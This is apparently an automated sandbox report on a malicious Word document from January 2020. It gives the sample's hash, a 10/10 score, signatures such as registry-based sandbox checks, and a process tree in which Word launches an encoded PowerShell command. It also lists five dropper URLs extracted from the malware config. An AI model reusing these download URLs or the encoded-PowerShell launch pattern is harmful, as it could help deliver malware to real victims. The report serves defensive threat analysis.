Analysis

  • max time kernel
    30s
  • resource
    win10v191014
  • submitted
    31-01-2020 08:04

General

  • Target

    12f17aa88c41cd66c648d4f19289192958e721c494829eb67962060967d804be.doc

  • Sample

    200131-z13g4b8vrx

  • SHA256

    12f17aa88c41cd66c648d4f19289192958e721c494829eb67962060967d804be

Score
10/10

Malware Config

Extracted

Language
ps1

Source URLs (exe.dropper)

  • http://alea.ir/f4k/1v/
  • http://www.baptist.sumy.ua/irardpxot/h/
  • http://baptist.sumy.ua/irardpxot/dtkv158/
  • http://www.ecoleannedeguigne.fr/wp-admin/x61n9/
  • http://goldengarden.com.br/cgi-bin/ty/

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\12f17aa88c41cd66c648d4f19289192958e721c494829eb67962060967d804be.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Checks processor information in registry
    • Enumerates system info in registry
    PID:4968
  • C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
    PoWERsheLL -e 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
    1⤵
    • Process spawned unexpected child process
    PID:4596

Network

MITRE ATT&CK Enterprise v6
